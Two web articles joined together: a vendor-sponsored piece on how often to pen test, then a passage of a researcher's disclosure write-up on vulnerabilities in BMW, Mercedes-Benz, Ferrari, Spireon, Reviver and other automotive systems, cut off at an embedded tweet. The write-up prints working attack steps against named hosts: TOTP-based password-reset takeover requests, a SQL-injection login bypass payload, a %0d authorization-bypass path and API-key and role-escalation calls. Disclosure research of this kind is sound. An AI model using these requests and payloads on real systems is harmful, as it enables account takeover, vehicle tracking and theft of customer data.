Is Once-Yearly Pen Testing Enough for Your Organization?

Any organization that handles sensitive data must be diligent in its security efforts, which include regular pen testing. Even a small data breach can result in significant damage to an organization’s reputation and bottom line.

There are two main reasons why regular pen testing is necessary for secure web application development:

  • Security: Web applications are constantly evolving, and new vulnerabilities are being discovered all the time. Pen testing helps identify vulnerabilities that could be exploited by hackers and allows you to fix them before they can do any damage.
  • Compliance: Depending on your industry and the type of data you handle, you may be required to comply with certain security standards (e.g., PCI DSS, NIST, HIPAA). Regular pen testing can help you verify that your web applications meet these standards and avoid penalties for non-compliance.

How Often Should You Pentest?#

Many organizations, big and small, have once a year pen testing cycle. But what’s the best frequency for pen testing? Is once a year enough, or do you need to be more frequent?

The answer depends on several factors, including the type of development cycle you have, the criticality of your web applications, and the industry you’re in.

You may need more frequent pen testing if:

You Have an Agile or Continuous Release Cycle#

Agile development cycles are characterized by short release cycles and rapid iterations. This can make it difficult to keep track of changes made to the codebase and makes it more likely that security vulnerabilities will be introduced.

If you’re only testing once a year, there’s a good chance that vulnerabilities will go undetected for long periods of time. This could leave your organization open to attack.

To mitigate this risk, pen testing cycles should align with the organization’s development cycle. For static web applications, testing every 4-6 months should be sufficient. But for web applications that are updated frequently, you may need to test more often, such as monthly or even weekly.

Your Web Applications Are Business-Critical#

Any system that is essential to your organization’s operations should be given extra attention when it comes to security. This is because a breach of these systems could have a devastating impact on your business. If your organization relies heavily on its web applications to do business, any downtime could result in significant financial losses.

For example, imagine that your organization’s e-commerce site went down for an hour due to a DDoS attack. Not only would you lose out on potential sales, but you would also have to deal with the cost of the attack and the negative publicity.

To avoid this scenario, it’s important to ensure that your web applications are always available and secure.

Non-critical web applications can usually get away with being tested once a year, but business-critical web applications should be tested more frequently to ensure they are not at risk of a major outage or data loss.

Your Web Applications Are Customer-Facing#

If all your web applications are internal, you may be able to get away with pen testing less frequently. However, if your web applications are accessible to the public, you must be extra diligent in your security efforts.

Web applications accessible to external traffic are more likely to be targeted by attackers. This is because there is a greater pool of attack vectors and more potential entry points for an attacker to exploit.

Customer-facing web applications also tend to have more users, which means that any security vulnerabilities will be exploited more quickly. For example, a cross-site scripting (XSS) vulnerability in an external web application with millions of users could be exploited within hours of being discovered.

To protect against these threats, it’s important to pen test customer-facing web applications more frequently than internal ones. Depending on the size and complexity of the application, you may need to pen test every month or even every week.

You Are in a High-Risk Industry#

Certain industries are more likely to be targeted by hackers due to the sensitive nature of their data. Healthcare organizations, for example, are often targeted because of the protected health information (PHI) they hold.

If your organization is in a high-risk industry, you should consider conducting pen testing more frequently to ensure that your systems are secure and meet regulatory compliance. This will help protect your data and reduce the chances of a costly security incident.

You Don’t Have Internal Security Operations or a Pen testing Team#

This might sound counterintuitive, but if you don’t have an internal security team, you may need to conduct pen testing more frequently.

Organizations that don’t have dedicated security staff are more likely to be vulnerable to attacks.

Without an internal security team, you will need to rely on external pen testers to assess your organization’s security posture.

Depending on the size and complexity of your organization, you may need to pen test every month or even every week.

You Are Focused on Mergers or Acquisitions#

During a merger or acquisition, there is often a lot of confusion and chaos. This can make it difficult to keep track of all the systems and data that need to be secured. As a result, it’s important to conduct pen testing more frequently during these times to ensure that all systems are secure.

M&A also means that you are adding new web applications to your organization’s infrastructure. These new applications may have unknown security vulnerabilities that could put your entire organization at risk.

In 2016, Marriott acquired Starwood without being aware that hackers had exploited a flaw in Starwood’s reservation system two years earlier. Over 500 million customer records were compromised. This placed Marriott in hot water with the British watchdog ICO, resulting in 18.4 million pounds in fines in the UK. According to Bloomberg, there is more trouble ahead, as the hotel giant could “face up to $1 billion in regulatory fines and litigation costs.”

To protect against these threats, it’s important to conduct pen testing before and after an acquisition. This will help you identify potential security issues so they can be fixed before the transition is complete.

The Importance of Continuous Pen Testing#

While periodic pen testing is important, it is no longer enough in today’s world. As businesses rely more on their web applications, continuous pen testing becomes increasingly important.

There are two main types of pen testing: time-boxed and continuous.

Traditional pen testing is done on a set schedule, such as once a year. This type of pen testing is no longer enough in today’s world, as businesses rely more on their web applications.

Continuous pen testing is the process of continuously scanning your systems for vulnerabilities. This allows you to identify and fix vulnerabilities before they can be exploited by attackers. Continuous pen testing allows you to find and fix security issues as they happen instead of waiting for a periodic assessment.

Continuous pen testing is especially important for organizations that have an agile development cycle. Since new code is deployed frequently, there is a greater chance for security vulnerabilities to be introduced.

Pen testing as a service models is where continuous pen testing shine. Outpost24’s PTaaS (Penetration-Testing-as-a-Service) platform enables businesses to conduct continuous pen testing with ease. The Outpost24 platform is always up-to-date with an organization’s latest security threats and vulnerabilities, so you can be confident that your web applications are secure.

  • Manual and automated pen testing: Outpost24’s PTaaS platform combines manual and automated pen testing to give you the best of both worlds. This means you can find and fix vulnerabilities faster while still getting the benefits of expert analysis.
  • Provides comprehensive coverage: Outpost24’s platform covers all OWASP Top 10 vulnerabilities and more. This means that you can be confident that your web applications are secure against the latest threats.
  • Is cost-effective: With Outpost24, you only pay for the services you need. This makes it more affordable to conduct continuous pen testing, even for small businesses.

The Bottom Line#

Regular pen testing is essential for secure web application development. Depending on your organization’s size, industry, and development cycle, you may need to revise your pen testing schedule.

Once-a-year pen testing cycle may be enough for some organizations, but for most, it is not. For business-critical, customer-facing, or high-traffic web applications, you should consider continuous pen testing.

Outpost24’s PTaaS platform makes it easy and cost-effective to conduct continuous pen testing. Contact us today to learn more about our platform and how we can help you secure your web applications.

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.

Source :
https://thehackernews.com/2023/01/is-once-yearly-pen-testing-enough-for.html

Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try) to take a break from our usual computer work.

While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn’t resist poking at the scooter’s mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

https://youtube.com/watch?v=YRAy3wv5SCk%3Ffeature%3Doembed

When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in trying to more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely.

At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports it.

Findings Summary

During our engagement, we found the following vulnerabilities in the companies listed below:

  • Kia, Honda, Infiniti, Nissan, Acura
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number
    • Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
      • For Kia’s specifically, we could remotely access the 360-view camera and view live images from the car
  • Mercedes-Benz
    • Access to hundreds of mission-critical internal applications via improperly configured SSO, including…
      • Multiple Github instances behind SSO
      • Company-wide internal chat tool, ability to join nearly any channel
      • SonarQube, Jenkins, misc. build servers
      • Internal cloud deployment services for managing AWS instances
      • Internal Vehicle related APIs
    • Remote Code Execution on multiple systems
    • Memory leaks leading to employee/customer PII disclosure, account access
  • Hyundai, Genesis
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address
    • Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
  • BMW, Rolls Royce
    • Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee, allowed us to…
      • Access to internal dealer portals where you can query any VIN number to retrieve sales documents for BMW
      • Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships
  • Ferrari
    • Full zero-interaction account takeover for any Ferrari customer account
    • IDOR to access all Ferrari customer records
    • Lack of access control allowing an attacker to create, modify, delete employee “back office” administrator user accounts and all user accounts with capabilities to modify Ferrari owned web pages through the CMS system
    • Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers)
  • Spireon
  • Ford
    • Full memory disclosure on production vehicle Telematics API discloses
      • Discloses customer PII and access tokens for tracking and executing commands on vehicles
      • Discloses configuration credentials used for internal services related to Telematics
      • Ability to authenticate into customer account and access all PII and perform actions against vehicles
    • Customer account takeover via improper URL parsing, allows an attacker to completely access victim account including vehicle portal
  • Reviver
    • Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following:
      • Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text)
      • Update any vehicle status to “STOLEN” which updates the license plate and informs authorities
      • Access all user records, including what vehicles people owned, their physical address, phone number, and email address
      • Access the fleet management functionality for any company, locate and manage all vehicles in a fleet
  • Porsche
    • Ability to send retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle Telematics service
  • Toyota
    • IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota financial customers
  • Jaguar, Land Rover
    • User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information
  • SiriusXM
    • Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius

Vulnerability Writeups

(1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO

While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMWs assets.

For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure.

The first thing we did was fingerprint the host using OSINT tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed API endpoints on the host via sending the following HTTP request:

GET /rest/api/application.wadl HTTP/1.1
Host: xpita.bmwgroup.com

The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available.

One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like “sam*” and retrieve the user information for a user named “sam.curry” without having to guess the actual username.

HTTP Request

GET /reset/api/users/example* HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

{“id”:”redacted”,”firstName”:”Example”,”lastName”:”User”,”userName”:”example.user”}

Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the “/rest/api/chains/accounts/:user_id/totp” endpoint. We noticed the word “totp” which usually stood for one-time password generation.

When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior:

HTTP Request

GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: text/plain

9373958

For whatever reason, it appeared that this HTTP request would generate a TOTP for the user’s account. We guessed that this interaction worked with the “forgot password” functionality, so we found an example user account by querying “example*” using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a reset password attempt for the user account until we got to the point where the system requested a TOTP code from the user’s 2FA device (e.g. email or phone).

At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field.

It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user.

At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees.

To demonstrate the impact of the vulnerability, we simply Googled “BMW dealer portal” and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships.

After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle.

With our level of access, there was a huge amount of functionality we could’ve performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability.

The vulnerabilities reported to BMW and Rolls Royce have since been fixed.

(2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz and Rolls Royce via Misconfigured SSO

Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle and so we began auditing the Mercedes-Benz infrastructure. We took the same approach as BMW and began testing the Mercedes-Benz employee SSO.

We weren’t able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration so we could gain SSO credentials to access, even at a limited level, the employee applications.

After fuzzing random sites for a while, we eventually found the “umas.mercedes-benz.com” website which was built for vehicle repair shops to request specific tools access from Mercedes-Benz. The website had public registration enabled as it was built for repair shops and appeared to write to the same database as the core employee LDAP system.

We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool, it was “git.mercedes-benz.com”, short for Github. We attempted to use our user credentials to sign in to the Mercedes-Benz Github and saw that we were able to login. Success!

The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app and added it to our account, entered our code, then saw that we were in. We had access to “git.mercedes-benz.com” and began looking around.

After a few minutes, we saw that the Github instance had internal documentation and source code for various Mercedes-Benz projects including the Mercedes Me Connect app which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application for Mercedes-Benz themselves to talk to customer vehicles and the specific steps one would have to take to talk to customer vehicles.

At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact.

We used our employee account to login to numerous applications which contained sensitive information and achieved remote code execution via exposed actuators, spring boot consoles, and dozens of sensitive internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure.

To give an overview, we could access the following services:

  • Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure
  • Spring boot actuators which lead to remote code execution, information disclosure, on sensitive employee and customer facing applications
    Jenkins instances
  • AWS and cloud-computing control panels where we could request, manage, and access various internal systems
  • XENTRY systems used to communicate with customer vehicles
  • Internal OAuth and application-management related functionality for configuring and managing internal apps
  • Hundreds of miscellaneous internal services

(3) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites

When we began targeting Ferrari, we mapped out all domains under the publicly available domains like “ferrari.com” and browsed around to see what was accessible. One target we found was “api.ferrari.com”, a domain which offered both customer facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API.

We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`.

One of the patterns we notice when testing web applications is poorly implemented single sign on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript present for these applications, allowing us to understand the backend API routes in use.

When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials or at the very least, tell you where the backend API is, that the application talks to.

For this application, we noticed the following constants were set:

const i = {
                        production: !0,
                        envName: "production",
                        version: "0.0.0",
                        build: "20221223T162641363Z",
                        name: "ferrari.dws-preowned.backoffice",
                        formattedName: "CMS SPINDOX",
                        feBaseUrl: "https://{{domain}}.ferraridealers.com/",
                        fePreownedBaseUrl: "https://{{domain}}.ferrari.com/",
                        apiUrl: "https://api.ferrari.com/cms/dws/back-office/",
                        apiKey: "REDACTED",
                        s3Bucket: "ferrari-dws-preowned-pro",
                        cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/",
                        thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/"
                    }

From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`.

Digging further into the JavaScript we can look for references to `apiUrl` which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called:

})).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({
                                    headers: e.headers.set("Authorization", "" + (s || void 0))
                                })).clone({
                                    headers: e.headers.set("x-api-key", "" + a)
                                }));

All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API.

Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user.

While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`:

return t.prototype.getConnectors = function() {
    return this.httpClient.get("rest-connectors")
}, t.prototype.getConnectorById = function(t) {
    return this.httpClient.get("rest-connectors/" + t)
}, t.prototype.createConnector = function(t) {
    return this.httpClient.post("rest-connectors", t)
}, t.prototype.updateConnector = function(t, e) {
    return this.httpClient.put("rest-connectors/" + t, e)
}, t.prototype.deleteConnector = function(t) {
    return this.httpClient.delete("rest-connectors/" + t)
}, t.prototype.getItems = function() {
    return this.httpClient.get("rest-connector-models")
}, t.prototype.getItemById = function(t) {
    return this.httpClient.get("rest-connector-models/" + t)
}, t.prototype.createItem = function(t) {
    return this.httpClient.post("rest-connector-models", t)
}, t.prototype.updateItem = function(t, e) {
    return this.httpClient.put("rest-connector-models/" + t, e)
}, t.prototype.deleteItem = function(t) {
    return this.httpClient.delete("rest-connector-models/" + t)
}, t

The following request unlocked the final piece in the puzzle. Sending the following request revealed a treasure trove of API credentials for Ferrari: :

GET /cms/dws/back-office/rest-connector-models HTTP/1.1

To explain what this endpoint’s purpose was: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hitting this API endpoint, it returned this list of API endpoints, hosts and authorization headers (in plain text). 

This information disclosure allowed us to query Ferrari’s production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones. 

HTTP Request

GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1
Host: fcd.services.ferrari.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

…"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"…

The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname.

Additionally, an attacker could POST to the “/core/api/v1/Users/:id/Roles” endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner.

This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile.

(4) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 million Telematics systems and Additionally Fully Takeover Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems

When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, Goldstar, and FleetLocate which were standalone devices which were put into vehicles to track and manage them. The devices have the capabilities to be tracked and receive arbitrary commands, e.g. locking the starter so the vehicle cannot start.

Sometime in the past, Spireon had acquired many GPS Vehicle Tracking and Management Companies and put them under the Spireon parent company. 

We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers and additionally many services through their subsidiary companies like OnStar.

We decided to research them as, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles with very interesting functionalities like sending a cities police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers.

Our first target for this was very obvious: admin.spireon.com

The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login.

Since the website was so old, we tried the trusted manual SQL injection payloads but were kicked out by a WAF that was installed on the system

We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password field was being passed to a system which could likely be vulnerable to some sort of SQL injection attack.

For the username field, we came up with a very simple payload:

victim' #

The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite’s intruder with a common username list and observed that we received various 301 redirects to “/dashboard” for the username “administrator” and “admin”.

After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints.

The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices and retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration including what servers it reached out to download updated firmware.

Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software.

At this point, an attacker could backdoor the Spireon device and run arbitrary commands against the device. 

Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations.

We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the “admin.spireon.com” service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error.

Our goal now was seeing if we could find some sort of authorization bypass on the host and what endpoints were accessible. By bypassing the administrator UI, we could directly reach out to each device and have direct queries for vehicles and user accounts via the backend API calls.

We fuzzed the host and eventually observed some weird behavior:

By sending any string with “admin” or “dashboard”, the system would trigger an HTTP 403 forbidden response, but would return 404 if we didn’t include this string. As an example, if we attempted to load “/anything-admin-anything” we’d receive 403 forbidden, while if we attempted to load “/anything-anything” it would return a 404.

We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters.

During scanning, we saw that the following HTTP requests would return a 200 OK response:

GET /%0dadmin
GET /%0ddashboard

Through Burp Suite, we sent the HTTP response to our browser and observed the response: it was a full administrative portal for the core Spireon app. We quickly set up a match and replace rule to modify GET /admin and GET /dashboard to the endpoints with the %0d prefix.

After setting up this rule, we could browse to “/admin” or “/dashboard” and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything.

At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app.

For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US Police Department where we could track the entire police fleet.

(5) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information

In October, 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all of the digital license plates, were done through a company called Reviver.

If someone wanted a digital license plate, they’d buy the virtual Reviver license plate which included a SIM card for remotely tracking and updating the license plate. Customers who uses Reviver could remotely update their license plates slogan, background, and additionally report if the car had been stolen via setting the plate tag to “STOLEN”.

Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the “pr-api.rplate.com” website. After creating a user account, our user account was assigned to a unique “company” JSON object which allowed us to add other sub-users to our account.

The company JSON object was super interesting as we could update many of the JSON fields within the object. One of these fields was called “type” and was default set to “CONSUMER”. After noticing this, we dug through the app source code in hopes that we could find another value to set it to, but were unsuccessful.

At this point, we took a step back and wondered if there was an actual website we could talk to versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a reset password on our account which gave us a URL to navigate to.

Once we opened the password reset URL, we observed that the website had tons of functionality including the ability to administer vehicles, fleets, and user accounts. This was super interesting as we now had a lot more API endpoints and functionality to access. Additionally, the JavaScript on the website appeared to have the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.)

We queried the “CONSUMER” string in the JavaScript and saw that there were other roles that were defined in the JavaScript. After attempting to update our “role” parameter to the disclosed “CORPORATE” role, we refreshed out profile metadata, then saw that it was successful! We were able to change our roles to ones other than the default user account, opening the door to potential privilige escalation vulnerabilities.

It appeared that, even though we had updated our account to the “CORPORATE” role, we were still receiving authorization vulnerabilities when logging into the website. We thought for a while until realizing that we could invite users to our modified account which had the elevated role, which may then grant the invited users the required permissions since they were invited via an intended way versus mass assigning an account to an elevated role.

After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account which would be assigned the appropriate permissions.

This perplexed us as there was likely some administration group which existed in the system but that we had not yet identified. We brute forced the “type” parameter using wordlists until we noticed that setting our group to the number “4” had updated our role to “REVIVER_ROLE”. It appeared that the roles were indexed to numbers, and we could simply run through the numbers 0-100 and find all the roles on the website.

The “0” role was the string “REVIVER”, and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn’t click any buttons. From what we could guess, we had the administrator role but were accessing the account using the customer facing frontend website and not the appropriate administrator frontend website. We would have to find the endpoints used by administrators ourselves.

Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else’s data: this worked!

We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization.

At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone’s REVIVER plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package REVIVER plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags.

The Reviver website also offered fleet management functionality which we had full access to.

(6) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://platform.twitter.com/embed/Tweet.html?dnt=true&embedId=twitter-widget-0&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2J1c2luZXNzX3ZlcmlmaWVkX2JhZGdlIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0ZndfbWl4ZWRfbWVkaWFfMTU4OTciOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd19zZW5zaXRpdmVfbWVkaWFfaW50ZXJzdGl0aWFsXzEzOTYzIjp7ImJ1Y2tldCI6ImludGVyc3RpdGlhbCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2R1cGxpY2F0ZV9zY3JpYmVzX3RvX3NldHRpbmdzIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd192aWRlb19obHNfZHluYW1pY19tYW5pZmVzdHNfMTUwODIiOnsiYnVja2V0IjoidHJ1ZV9iaXRyYXRlIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2JsdWVfdmVyaWZpZWRfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2xlZ2FjeV90aW1lbGluZV9zdW5zZXQiOnsiYnVja2V0IjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2dvdl92ZXJpZmllZF9iYWRnZSI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2hvd19idXNpbmVzc19hZmZpbGlhdGVfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=false&id=1597695281881296897&lang=en&origin=https%3A%2F%2Fsamcurry.net%2Fweb-hackers-vs-the-auto-industry%2F&sessionId=53b9ca9842ac4a0ce6fd39e82f4b1bd614f85d70&theme=light&widgetsVersion=a3525f077c700%3A1667415560940&width=550px

